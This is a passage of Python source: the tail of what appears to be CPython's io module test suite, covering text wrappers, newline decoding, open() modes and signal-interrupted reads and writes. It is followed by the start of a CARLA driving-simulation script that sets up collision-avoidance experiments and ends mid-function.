        # Run a subprocess whose __del__ creates a TextIOWrapper during
        # interpreter shutdown; *kwargs* are forwarded to TextIOWrapper.
        iomod = self.io.__name__
        code = """if 1:
            import codecs
            import {iomod} as io

            # Avoid looking up codecs at shutdown
            codecs.lookup('utf-8')

            class C:
                def __init__(self):
                    self.buf = io.BytesIO()
                def __del__(self):
                    io.TextIOWrapper(self.buf, **{kwargs})
                    print("ok")
            c = C()
            """.format(iomod=iomod, kwargs=kwargs)
        return assert_python_ok("-c", code)
    def test_create_at_shutdown_without_encoding(self):
        """Creating a wrapper at shutdown either works or fails with the
        implementation-specific shutdown error — never a crash."""
        rc, out, err = self._check_create_at_shutdown()
        if err:
            # Can error out with a RuntimeError if the module state
            # isn't found.
            self.assertIn(self.shutdown_error, err.decode())
        else:
            self.assertEqual("ok", out.decode().strip())
    def test_create_at_shutdown_with_encoding(self):
        """With an explicit (pre-cached) encoding, shutdown creation must
        succeed cleanly."""
        rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
                                                      errors='strict')
        self.assertFalse(err)
        self.assertEqual("ok", out.decode().strip())
    def test_issue22849(self):
        """Issue #22849: repeatedly failing TextIOWrapper construction on an
        object without tell() must not leak or crash; it succeeds once
        tell() exists."""
        class F(object):
            def readable(self): return True
            def writable(self): return True
            def seekable(self): return True

        for i in range(10):
            try:
                self.TextIOWrapper(F(), encoding='utf-8')
            except Exception:
                pass

        F.tell = lambda x: 0
        t = self.TextIOWrapper(F(), encoding='utf-8')
class CTextIOWrapperTest(TextIOWrapperTest):
    """TextIOWrapperTest run against the C implementation (module `io`),
    plus C-specific initialization and garbage-collection checks."""
    io = io
    # Error text emitted when a wrapper is created during shutdown.
    shutdown_error = "RuntimeError: could not find io module state"

    def test_initialization(self):
        """Invalid __init__ arguments leave the wrapper unusable."""
        r = self.BytesIO(b"\xc3\xa9\n\n")
        b = self.BufferedReader(r, 1000)
        t = self.TextIOWrapper(b)
        self.assertRaises(TypeError, t.__init__, b, newline=42)
        self.assertRaises(ValueError, t.read)
        self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
        self.assertRaises(ValueError, t.read)
        # A never-initialized instance must not crash repr().
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        self.assertRaises(Exception, repr, t)

    def test_garbage_collection(self):
        # C TextIOWrapper objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends in gc.garbage instead.
        with support.check_warnings(('', ResourceWarning)):
            rawio = io.FileIO(support.TESTFN, "wb")
            b = self.BufferedWriter(rawio)
            t = self.TextIOWrapper(b, encoding="ascii")
            t.write("456def")
            t.x = t  # create a reference cycle
            wr = weakref.ref(t)
            del t
            support.gc_collect()
        self.assertTrue(wr() is None, wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"456def")

    def test_rwpair_cleared_before_textio(self):
        # Issue 13070: TextIOWrapper's finalization would crash when called
        # after the reference to the underlying BufferedRWPair's writer got
        # cleared by the GC.
        for i in range(1000):
            b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
            t1 = self.TextIOWrapper(b1, encoding="ascii")
            b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
            t2 = self.TextIOWrapper(b2, encoding="ascii")
            # circular references
            t1.buddy = t2
            t2.buddy = t1
        support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
    """TextIOWrapperTest run against the pure-Python implementation."""
    io = pyio
    #shutdown_error = "LookupError: unknown encoding: ascii"
    # Error text emitted when a wrapper is created during shutdown.
    shutdown_error = "TypeError: 'NoneType' object is not iterable"
class IncrementalNewlineDecoderTest(unittest.TestCase):
    """Tests for IncrementalNewlineDecoder (universal-newline translation).

    The concrete class under test is injected by load_tests() as
    self.IncrementalNewlineDecoder (C or pure-Python implementation).
    """

    def check_newline_decoding_utf8(self, decoder):
        # UTF-8 specific tests for a newline decoder
        def _check_decode(b, s, **kwargs):
            # We exercise getstate() / setstate() as well as decode()
            state = decoder.getstate()
            self.assertEqual(decoder.decode(b, **kwargs), s)
            decoder.setstate(state)
            self.assertEqual(decoder.decode(b, **kwargs), s)

        # Multi-byte characters may arrive split across decode() calls;
        # output is withheld until the character is complete.
        _check_decode(b'\xe8\xa2\x88', "\u8888")

        _check_decode(b'\xe8', "")
        _check_decode(b'\xa2', "")
        _check_decode(b'\x88', "\u8888")

        _check_decode(b'\xe8', "")
        _check_decode(b'\xa2', "")
        _check_decode(b'\x88', "\u8888")

        # A trailing incomplete sequence is an error at final=True.
        _check_decode(b'\xe8', "")
        self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)

        decoder.reset()
        _check_decode(b'\n', "\n")
        _check_decode(b'\r', "")
        _check_decode(b'', "\n", final=True)
        _check_decode(b'\r', "\n", final=True)

        # A lone '\r' is held back in case a '\n' follows.
        _check_decode(b'\r', "")
        _check_decode(b'a', "\na")

        _check_decode(b'\r\r\n', "\n\n")
        _check_decode(b'\r', "")
        _check_decode(b'\r', "\n")
        _check_decode(b'\na', "\na")

        _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
        _check_decode(b'\xe8\xa2\x88', "\u8888")
        _check_decode(b'\n', "\n")
        _check_decode(b'\xe8\xa2\x88\r', "\u8888")
        _check_decode(b'\n', "\n")

    def check_newline_decoding(self, decoder, encoding):
        """Feed newline-mixed text byte-by-byte (or char-by-char when
        *encoding* is None) and check translation plus the .newlines
        attribute, which accumulates the newline styles seen."""
        result = []
        if encoding is not None:
            encoder = codecs.getincrementalencoder(encoding)()
            def _decode_bytewise(s):
                # Decode one byte at a time
                for b in encoder.encode(s):
                    result.append(decoder.decode(bytes([b])))
        else:
            encoder = None
            def _decode_bytewise(s):
                # Decode one char at a time
                for c in s:
                    result.append(decoder.decode(c))
        self.assertEqual(decoder.newlines, None)
        _decode_bytewise("abc\n\r")
        self.assertEqual(decoder.newlines, '\n')
        _decode_bytewise("\nabc")
        self.assertEqual(decoder.newlines, ('\n', '\r\n'))
        _decode_bytewise("abc\r")
        self.assertEqual(decoder.newlines, ('\n', '\r\n'))
        _decode_bytewise("abc")
        self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
        _decode_bytewise("abc\r")
        self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
        decoder.reset()
        input = "abc"
        if encoder is not None:
            encoder.reset()
            input = encoder.encode(input)
        self.assertEqual(decoder.decode(input), "abc")
        # reset() also clears the recorded newline styles.
        self.assertEqual(decoder.newlines, None)

    def test_newline_decoder(self):
        encodings = (
            # None meaning the IncrementalNewlineDecoder takes unicode input
            # rather than bytes input
            None, 'utf-8', 'latin-1',
            'utf-16', 'utf-16-le', 'utf-16-be',
            'utf-32', 'utf-32-le', 'utf-32-be',
        )
        for enc in encodings:
            decoder = enc and codecs.getincrementaldecoder(enc)()
            decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
            self.check_newline_decoding(decoder, enc)
        decoder = codecs.getincrementaldecoder("utf-8")()
        decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
        self.check_newline_decoding_utf8(decoder)

    def test_newline_bytes(self):
        # Issue 5433: Excessive optimization in IncrementalNewlineDecoder
        # Characters that merely *contain* CR/LF byte values (e.g. U+0D00,
        # U+0A00) must not be mistaken for newlines.
        def _check(dec):
            self.assertEqual(dec.newlines, None)
            self.assertEqual(dec.decode("\u0D00"), "\u0D00")
            self.assertEqual(dec.newlines, None)
            self.assertEqual(dec.decode("\u0A00"), "\u0A00")
            self.assertEqual(dec.newlines, None)
        dec = self.IncrementalNewlineDecoder(None, translate=False)
        _check(dec)
        dec = self.IncrementalNewlineDecoder(None, translate=True)
        _check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
    # C implementation variant; namespace is injected by load_tests().
    pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
    # Pure-Python implementation variant; namespace injected by load_tests().
    pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
    """Miscellaneous behaviour shared by the C and Python io modules:
    public API surface, open() modes, pickling, destructor warnings,
    and non-blocking pipe writes.

    self.io / self.open / mock classes are injected by load_tests().
    """

    def tearDown(self):
        support.unlink(support.TESTFN)

    def test___all__(self):
        """Everything in io.__all__ exists and is either open, an
        exception type, a SEEK_* constant, or an IOBase subclass."""
        for name in self.io.__all__:
            obj = getattr(self.io, name, None)
            self.assertTrue(obj is not None, name)
            if name == "open":
                continue
            elif "error" in name.lower() or name == "UnsupportedOperation":
                self.assertTrue(issubclass(obj, Exception), name)
            elif not name.startswith("SEEK_"):
                self.assertTrue(issubclass(obj, self.IOBase))

    def test_attributes(self):
        """mode/name attributes are exposed at every layer of the stack."""
        f = self.open(support.TESTFN, "wb", buffering=0)
        self.assertEqual(f.mode, "wb")
        f.close()

        # "U" (universal newlines) mode is deprecated but still reported.
        with support.check_warnings(('', DeprecationWarning)):
            f = self.open(support.TESTFN, "U")
        self.assertEqual(f.name, support.TESTFN)
        self.assertEqual(f.buffer.name, support.TESTFN)
        self.assertEqual(f.buffer.raw.name, support.TESTFN)
        self.assertEqual(f.mode, "U")
        self.assertEqual(f.buffer.mode, "rb")
        self.assertEqual(f.buffer.raw.mode, "rb")
        f.close()

        f = self.open(support.TESTFN, "w+")
        self.assertEqual(f.mode, "w+")
        self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
        self.assertEqual(f.buffer.raw.mode, "rb+")

        # Opening by file descriptor: .name is the fd itself.
        g = self.open(f.fileno(), "wb", closefd=False)
        self.assertEqual(g.mode, "wb")
        self.assertEqual(g.raw.mode, "wb")
        self.assertEqual(g.name, f.fileno())
        self.assertEqual(g.raw.name, f.fileno())
        f.close()
        g.close()

    def test_io_after_close(self):
        """Every operation on a closed file raises ValueError, for each
        combination of mode and buffering."""
        for kwargs in [
                {"mode": "w"},
                {"mode": "wb"},
                {"mode": "w", "buffering": 1},
                {"mode": "w", "buffering": 2},
                {"mode": "wb", "buffering": 0},
                {"mode": "r"},
                {"mode": "rb"},
                {"mode": "r", "buffering": 1},
                {"mode": "r", "buffering": 2},
                {"mode": "rb", "buffering": 0},
                {"mode": "w+"},
                {"mode": "w+b"},
                {"mode": "w+", "buffering": 1},
                {"mode": "w+", "buffering": 2},
                {"mode": "w+b", "buffering": 0},
            ]:
            f = self.open(support.TESTFN, **kwargs)
            f.close()
            self.assertRaises(ValueError, f.flush)
            self.assertRaises(ValueError, f.fileno)
            self.assertRaises(ValueError, f.isatty)
            self.assertRaises(ValueError, f.__iter__)
            if hasattr(f, "peek"):
                self.assertRaises(ValueError, f.peek, 1)
            self.assertRaises(ValueError, f.read)
            if hasattr(f, "read1"):
                self.assertRaises(ValueError, f.read1, 1024)
            if hasattr(f, "readall"):
                self.assertRaises(ValueError, f.readall)
            if hasattr(f, "readinto"):
                self.assertRaises(ValueError, f.readinto, bytearray(1024))
            self.assertRaises(ValueError, f.readline)
            self.assertRaises(ValueError, f.readlines)
            self.assertRaises(ValueError, f.seek, 0)
            self.assertRaises(ValueError, f.tell)
            self.assertRaises(ValueError, f.truncate)
            self.assertRaises(ValueError, f.write,
                              b"" if "b" in kwargs['mode'] else "")
            self.assertRaises(ValueError, f.writelines, [])
            self.assertRaises(ValueError, next, f)

    def test_blockingioerror(self):
        # Various BlockingIOError issues
        # A reference cycle through the exception must still be collectable.
        class C(str):
            pass
        c = C("")
        b = self.BlockingIOError(1, c)
        c.b = b
        b.c = c
        wr = weakref.ref(c)
        del c, b
        support.gc_collect()
        self.assertTrue(wr() is None, wr)

    def test_abcs(self):
        # Test the visible base classes are ABCs.
        self.assertIsInstance(self.IOBase, abc.ABCMeta)
        self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
        self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
        self.assertIsInstance(self.TextIOBase, abc.ABCMeta)

    def _check_abc_inheritance(self, abcmodule):
        """open() results are instances of exactly the expected ABCs from
        *abcmodule* (raw for buffering=0, buffered for 'wb', text for 'w')."""
        with self.open(support.TESTFN, "wb", buffering=0) as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertIsInstance(f, abcmodule.RawIOBase)
            self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
            self.assertNotIsInstance(f, abcmodule.TextIOBase)
        with self.open(support.TESTFN, "wb") as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertNotIsInstance(f, abcmodule.RawIOBase)
            self.assertIsInstance(f, abcmodule.BufferedIOBase)
            self.assertNotIsInstance(f, abcmodule.TextIOBase)
        with self.open(support.TESTFN, "w") as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertNotIsInstance(f, abcmodule.RawIOBase)
            self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
            self.assertIsInstance(f, abcmodule.TextIOBase)

    def test_abc_inheritance(self):
        # Test implementations inherit from their respective ABCs
        self._check_abc_inheritance(self)

    def test_abc_inheritance_official(self):
        # Test implementations inherit from the official ABCs of the
        # baseline "io" module.
        self._check_abc_inheritance(io)

    def _check_warn_on_dealloc(self, *args, **kwargs):
        """Deallocating an open file must emit a ResourceWarning that
        mentions the file's repr."""
        f = open(*args, **kwargs)
        r = repr(f)
        with self.assertWarns(ResourceWarning) as cm:
            f = None
            support.gc_collect()
        self.assertIn(r, str(cm.warning.args[0]))

    def test_warn_on_dealloc(self):
        self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
        self._check_warn_on_dealloc(support.TESTFN, "wb")
        self._check_warn_on_dealloc(support.TESTFN, "w")

    def _check_warn_on_dealloc_fd(self, *args, **kwargs):
        fds = []
        def cleanup_fds():
            # Close any leftover pipe fds; EBADF means already closed.
            for fd in fds:
                try:
                    os.close(fd)
                except OSError as e:
                    if e.errno != errno.EBADF:
                        raise
        self.addCleanup(cleanup_fds)
        r, w = os.pipe()
        fds += r, w
        self._check_warn_on_dealloc(r, *args, **kwargs)
        # When using closefd=False, there's no warning
        r, w = os.pipe()
        fds += r, w
        with warnings.catch_warnings(record=True) as recorded:
            open(r, *args, closefd=False, **kwargs)
            support.gc_collect()
        self.assertEqual(recorded, [])

    def test_warn_on_dealloc_fd(self):
        self._check_warn_on_dealloc_fd("rb", buffering=0)
        self._check_warn_on_dealloc_fd("rb")
        self._check_warn_on_dealloc_fd("r")

    def test_pickling(self):
        # Pickling file objects is forbidden
        for kwargs in [
                {"mode": "w"},
                {"mode": "wb"},
                {"mode": "wb", "buffering": 0},
                {"mode": "r"},
                {"mode": "rb"},
                {"mode": "rb", "buffering": 0},
                {"mode": "w+"},
                {"mode": "w+b"},
                {"mode": "w+b", "buffering": 0},
            ]:
            for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
                with self.open(support.TESTFN, **kwargs) as f:
                    self.assertRaises(TypeError, pickle.dumps, f, protocol)

    @unittest.skipUnless(fcntl, 'fcntl required for this test')
    def test_nonblock_pipe_write_bigbuf(self):
        self._test_nonblock_pipe_write(16*1024)

    @unittest.skipUnless(fcntl, 'fcntl required for this test')
    def test_nonblock_pipe_write_smallbuf(self):
        self._test_nonblock_pipe_write(1024)

    def _set_non_blocking(self, fd):
        # Switch *fd* to O_NONBLOCK via fcntl.
        flags = fcntl.fcntl(fd, fcntl.F_GETFL)
        self.assertNotEqual(flags, -1)
        res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
        self.assertEqual(res, 0)

    def _test_nonblock_pipe_write(self, bufsize):
        """Write into a non-blocking pipe until it blocks, drain it, and
        check BlockingIOError bookkeeping plus end-to-end data integrity."""
        sent = []
        received = []
        r, w = os.pipe()
        self._set_non_blocking(r)
        self._set_non_blocking(w)

        # To exercise all code paths in the C implementation we need
        # to play with buffer sizes.  For instance, if we choose a
        # buffer size less than or equal to _PIPE_BUF (4096 on Linux)
        # then we will never get a partial write of the buffer.
        rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
        wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)

        with rf, wf:
            for N in 9999, 73, 7574:
                try:
                    i = 0
                    while True:
                        msg = bytes([i % 26 + 97]) * N
                        sent.append(msg)
                        wf.write(msg)
                        i += 1

                except self.BlockingIOError as e:
                    self.assertEqual(e.args[0], errno.EAGAIN)
                    self.assertEqual(e.args[2], e.characters_written)
                    # Truncate the last message to what was actually written.
                    sent[-1] = sent[-1][:e.characters_written]
                    received.append(rf.read())
                    msg = b'BLOCKED'
                    wf.write(msg)
                    sent.append(msg)

            while True:
                try:
                    wf.flush()
                    break
                except self.BlockingIOError as e:
                    self.assertEqual(e.args[0], errno.EAGAIN)
                    self.assertEqual(e.args[2], e.characters_written)
                    self.assertEqual(e.characters_written, 0)
                    received.append(rf.read())

            received += iter(rf.read, None)

        sent, received = b''.join(sent), b''.join(received)
        self.assertTrue(sent == received)
        self.assertTrue(wf.closed)
        self.assertTrue(rf.closed)

    def test_create_fail(self):
        # 'x' mode fails if file is existing
        with self.open(support.TESTFN, 'w'):
            pass
        self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')

    def test_create_writes(self):
        # 'x' mode opens for writing
        with self.open(support.TESTFN, 'xb') as f:
            f.write(b"spam")
        with self.open(support.TESTFN, 'rb') as f:
            self.assertEqual(b"spam", f.read())

    def test_open_allargs(self):
        # there used to be a buffer overflow in the parser for rawmode
        self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
    """MiscIOTest against the C implementation, plus a C-specific check."""
    io = io

    def test_readinto_buffer_overflow(self):
        # Issue #18025
        # A read() returning more bytes than the destination can hold must
        # raise ValueError, not overflow the buffer.
        class BadReader(self.io.BufferedIOBase):
            def read(self, n=-1):
                return b'x' * 10**6
        bufio = BadReader()
        b = bytearray(2)
        self.assertRaises(ValueError, bufio.readinto, b)
class PyMiscIOTest(MiscIOTest):
    # MiscIOTest against the pure-Python implementation.
    io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
    """Interaction of buffered/text I/O with POSIX signals: interrupted
    writes/reads must run signal handlers, propagate their exceptions,
    and retry correctly after EINTR."""

    def setUp(self):
        self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)

    def tearDown(self):
        signal.signal(signal.SIGALRM, self.oldalrm)

    def alarm_interrupt(self, sig, frame):
        # Raise ZeroDivisionError from inside the signal handler.
        1/0

    @unittest.skipUnless(threading, 'Threading required for this test.')
    def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
        """Check that a partial write, when it gets interrupted, properly
        invokes the signal handler, and bubbles up the exception raised
        in the latter."""
        read_results = []
        def _read():
            if hasattr(signal, 'pthread_sigmask'):
                # Keep SIGALRM delivery on the main thread.
                signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
            s = os.read(r, 1)
            read_results.append(s)
        t = threading.Thread(target=_read)
        t.daemon = True
        r, w = os.pipe()
        fdopen_kwargs["closefd"] = False
        try:
            wio = self.io.open(w, **fdopen_kwargs)
            t.start()
            # Fill the pipe enough that the write will be blocking.
            # It will be interrupted by the timer armed above.  Since the
            # other thread has read one byte, the low-level write will
            # return with a successful (partial) result rather than an EINTR.
            # The buffered IO layer must check for pending signal
            # handlers, which in this case will invoke alarm_interrupt().
            signal.alarm(1)
            try:
                self.assertRaises(ZeroDivisionError,
                            wio.write, item * (support.PIPE_MAX_SIZE // len(item) + 1))
            finally:
                signal.alarm(0)
                t.join()
            # We got one byte, get another one and check that it isn't a
            # repeat of the first one.
            read_results.append(os.read(r, 1))
            self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
        finally:
            os.close(w)
            os.close(r)
            # This is deliberate. If we didn't close the file descriptor
            # before closing wio, wio would try to flush its internal
            # buffer, and block again.
            try:
                wio.close()
            except OSError as e:
                if e.errno != errno.EBADF:
                    raise

    def test_interrupted_write_unbuffered(self):
        self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)

    def test_interrupted_write_buffered(self):
        self.check_interrupted_write(b"xy", b"xy", mode="wb")

    # Issue #22331: The test hangs on FreeBSD 7.2
    @support.requires_freebsd_version(8)
    def test_interrupted_write_text(self):
        self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")

    @support.no_tracing
    def check_reentrant_write(self, data, **fdopen_kwargs):
        """A write() re-entered from a signal handler must either raise
        RuntimeError ("reentrant call") or let the handler's exception out."""
        def on_alarm(*args):
            # Will be called reentrantly from the same thread
            wio.write(data)
            1/0
        signal.signal(signal.SIGALRM, on_alarm)
        r, w = os.pipe()
        wio = self.io.open(w, **fdopen_kwargs)
        try:
            signal.alarm(1)
            # Either the reentrant call to wio.write() fails with RuntimeError,
            # or the signal handler raises ZeroDivisionError.
            with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
                while 1:
                    for i in range(100):
                        wio.write(data)
                        wio.flush()
                    # Make sure the buffer doesn't fill up and block further writes
                    os.read(r, len(data) * 100)
            exc = cm.exception
            if isinstance(exc, RuntimeError):
                self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
        finally:
            wio.close()
            os.close(r)

    def test_reentrant_write_buffered(self):
        self.check_reentrant_write(b"xy", mode="wb")

    def test_reentrant_write_text(self):
        self.check_reentrant_write("xy", mode="w", encoding="ascii")

    def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
        """Check that a buffered read, when it gets interrupted (either
        returning a partial result or EINTR), properly invokes the signal
        handler and retries if the latter returned successfully."""
        r, w = os.pipe()
        fdopen_kwargs["closefd"] = False
        def alarm_handler(sig, frame):
            os.write(w, b"bar")
        signal.signal(signal.SIGALRM, alarm_handler)
        try:
            rio = self.io.open(r, **fdopen_kwargs)
            os.write(w, b"foo")
            signal.alarm(1)
            # Expected behaviour:
            # - first raw read() returns partial b"foo"
            # - second raw read() returns EINTR
            # - third raw read() returns b"bar"
            self.assertEqual(decode(rio.read(6)), "foobar")
        finally:
            rio.close()
            os.close(w)
            os.close(r)

    def test_interrupted_read_retry_buffered(self):
        self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
                                          mode="rb")

    def test_interrupted_read_retry_text(self):
        self.check_interrupted_read_retry(lambda x: x,
                                          mode="r")

    @unittest.skipUnless(threading, 'Threading required for this test.')
    def check_interrupted_write_retry(self, item, **fdopen_kwargs):
        """Check that a buffered write, when it gets interrupted (either
        returning a partial result or EINTR), properly invokes the signal
        handler and retries if the latter returned successfully."""
        select = support.import_module("select")
        # A quantity that exceeds the buffer size of an anonymous pipe's
        # write end.
        N = support.PIPE_MAX_SIZE
        r, w = os.pipe()
        fdopen_kwargs["closefd"] = False
        # We need a separate thread to read from the pipe and allow the
        # write() to finish.  This thread is started after the SIGALRM is
        # received (forcing a first EINTR in write()).
        read_results = []
        write_finished = False
        def _read():
            while not write_finished:
                while r in select.select([r], [], [], 1.0)[0]:
                    s = os.read(r, 1024)
                    read_results.append(s)
        t = threading.Thread(target=_read)
        t.daemon = True
        def alarm1(sig, frame):
            signal.signal(signal.SIGALRM, alarm2)
            signal.alarm(1)
        def alarm2(sig, frame):
            t.start()
        signal.signal(signal.SIGALRM, alarm1)
        try:
            wio = self.io.open(w, **fdopen_kwargs)
            signal.alarm(1)
            # Expected behaviour:
            # - first raw write() is partial (because of the limited pipe buffer
            #   and the first alarm)
            # - second raw write() returns EINTR (because of the second alarm)
            # - subsequent write()s are successful (either partial or complete)
            self.assertEqual(N, wio.write(item * N))
            wio.flush()
            write_finished = True
            t.join()
            self.assertEqual(N, sum(len(x) for x in read_results))
        finally:
            write_finished = True
            os.close(w)
            os.close(r)
            # This is deliberate. If we didn't close the file descriptor
            # before closing wio, wio would try to flush its internal
            # buffer, and could block (in case of failure).
            try:
                wio.close()
            except OSError as e:
                if e.errno != errno.EBADF:
                    raise

    def test_interrupted_write_retry_buffered(self):
        self.check_interrupted_write_retry(b"x", mode="wb")

    def test_interrupted_write_retry_text(self):
        self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
    # SignalsTest against the C implementation.
    io = io
class PySignalsTest(SignalsTest):
    # Run SignalsTest against the pure-Python implementation (_pyio).
    io = pyio
    # Handling reentrancy issues would slow down _pyio even more, so the
    # tests are disabled.
    test_reentrant_write_buffered = None
    test_reentrant_write_text = None
def load_tests(*args):
    """Assemble the test suite, injecting the proper io namespace (C or
    pure-Python) plus the matching mock classes into each test class."""
    tests = (CIOTest, PyIOTest,
             CBufferedReaderTest, PyBufferedReaderTest,
             CBufferedWriterTest, PyBufferedWriterTest,
             CBufferedRWPairTest, PyBufferedRWPairTest,
             CBufferedRandomTest, PyBufferedRandomTest,
             StatefulIncrementalDecoderTest,
             CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
             CTextIOWrapperTest, PyTextIOWrapperTest,
             CMiscIOTest, PyMiscIOTest,
             CSignalsTest, PySignalsTest,
             )
    mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
             MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
    all_members = io.__all__ + ["IncrementalNewlineDecoder"]
    module_globals = globals()

    def build_namespace(module, prefix):
        # Public io names from the module under test, plus this module's
        # prefixed mock classes under their unprefixed names.
        ns = {name: getattr(module, name) for name in all_members}
        for mock in mocks:
            ns[mock.__name__] = module_globals[prefix + mock.__name__]
        return ns

    c_io_ns = build_namespace(io, "C")
    py_io_ns = build_namespace(pyio, "Py")
    # Avoid turning open into a bound method.
    py_io_ns["open"] = pyio.OpenWrapper
    namespaces = {"C": c_io_ns, "Py": py_io_ns}
    for test in tests:
        for prefix, ns in namespaces.items():
            if test.__name__.startswith(prefix):
                for name, obj in ns.items():
                    setattr(test, name, obj)
                break
    return unittest.TestSuite(unittest.makeSuite(test) for test in tests)
if __name__ == "__main__":
    # unittest.main() picks up the suite assembled by load_tests() above.
    unittest.main()
|
intersection_scenario_generate.py | """
Copyright (c) College of Mechatronics and Control Engineering, Shenzhen University.
All rights reserved.
Description :
generate two vehicle at a specefic intersection
Author:Team Li
"""
import sys, os, glob, random, threading, time, pickle, datetime
from enum import Enum
from situation_assessment import _assess_one_obj_threat_score
from situation_assessment import _score_2_threat_degree
from situation_assessment import comfort_level_scores
from situation_assessment import safety_degree
from obj_state import ego_vehicle as ego_v
from obj_state import road_obj as road_o
import config
try:
    # Make the CARLA Python API importable from the configured egg file.
    sys.path.append(config.carla_egg_file)
    import carla
except Exception as err:
    # Preserve the original failure as the cause instead of the old bare
    # `except:` that silently discarded it — the real error (bad path,
    # wrong egg, missing dependency) now shows up in the traceback.
    raise ImportError('Please check your carla file') from err
from carla_utils.logging import logger
from carla_utils.world_ops import *
from mpl_toolkits.axisartist.parasite_axes import HostAxes, ParasiteAxes
import matplotlib.pyplot as plt
import numpy as np
from scipy import interpolate
class STRATEGY(Enum):
    """Collision-avoidance driving style; selects the control law used in
    control_host() once the threat threshold trips."""
    AGGRESSIVE = 0    # strategy_1: bang-bang emergency braking / full throttle
    NORMAL = 1        # strategy_2: PD control tracking the "attentive" likelihood
    CONSERVATIVE = 2  # strategy_3: PD control tracking the "safe" likelihood
########## ------- collision avoidance settings ------ #####
# Master switch: allow the emergency strategy to take over the host vehicle.
collision_avoidance = True
# Timestamp used to name the pickled experiment-results file.
now = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
experiment_name_map = {STRATEGY.AGGRESSIVE:'strategy_1',
                       STRATEGY.NORMAL:'strategy_2',
                       STRATEGY.CONSERVATIVE:'strategy_3'}
# When True, the recorded time series are pickled to save_experiment_data_to.
save_experiment_data = False
strategy_type = STRATEGY.CONSERVATIVE
experiment_name = experiment_name_map[strategy_type]
save_experiment_data_to = './experiment_results/' + experiment_name + '/' + experiment_name + '-' + str(now) + '.pickle'
########## ------- collision avoidance settings ------ #####
def get_host(world):
    """Return the vehicle actor whose role_name attribute is 'host_vehicle'.

    Raises:
        ValueError: if no such actor exists in the world.
    """
    for candidate in world.get_actors().filter('vehicle*'):
        if candidate.attributes['role_name'] == 'host_vehicle':
            return candidate
    raise ValueError('no host in world')
def get_other(world):
    """Return the vehicle actor whose role_name attribute is 'other_vehicle'.

    Raises:
        ValueError: if no such actor exists in the world.
    """
    for candidate in world.get_actors().filter('vehicle*'):
        if candidate.attributes['role_name'] == 'other_vehicle':
            return candidate
    raise ValueError('no other in world')
def savitzky_golay(y, window_size, order, deriv=0, rate=1):
    r"""Smooth (and optionally differentiate) data with a Savitzky-Golay filter.

    The Savitzky-Golay filter removes high frequency noise from data.
    It has the advantage of preserving the original shape and
    features of the signal better than other types of filtering
    approaches, such as moving averages techniques.

    Parameters
    ----------
    y : array_like, shape (N,)
        the values of the time history of the signal.
    window_size : int
        the length of the window. Must be an odd integer number.
    order : int
        the order of the polynomial used in the filtering.
        Must be less then `window_size` - 1.
    deriv: int
        the order of the derivative to compute (default = 0 means only smoothing)
    rate : number
        sample rate factor applied when computing derivatives (default 1).

    Returns
    -------
    ys : ndarray, shape (N)
        the smoothed signal (or it's n-th derivative).

    Raises
    ------
    ValueError
        if window_size or order cannot be coerced to int.
    TypeError
        if window_size is even/non-positive or too small for `order`.

    References
    ----------
    .. [1] A. Savitzky, M. J. E. Golay, Smoothing and Differentiation of
       Data by Simplified Least Squares Procedures. Analytical
       Chemistry, 1964, 36 (8), pp 1627-1639.
    .. [2] Numerical Recipes 3rd Edition: The Art of Scientific Computing
       W.H. Press, S.A. Teukolsky, W.T. Vetterling, B.P. Flannery
       Cambridge University Press ISBN-13: 9780521880688
    """
    import numpy as np
    from math import factorial
    try:
        # `np.int` was removed in NumPy 1.24 (deprecated since 1.20) and
        # raised AttributeError here; plain int() performs the same coercion.
        window_size = abs(int(window_size))
        order = abs(int(order))
    except (ValueError, TypeError) as exc:
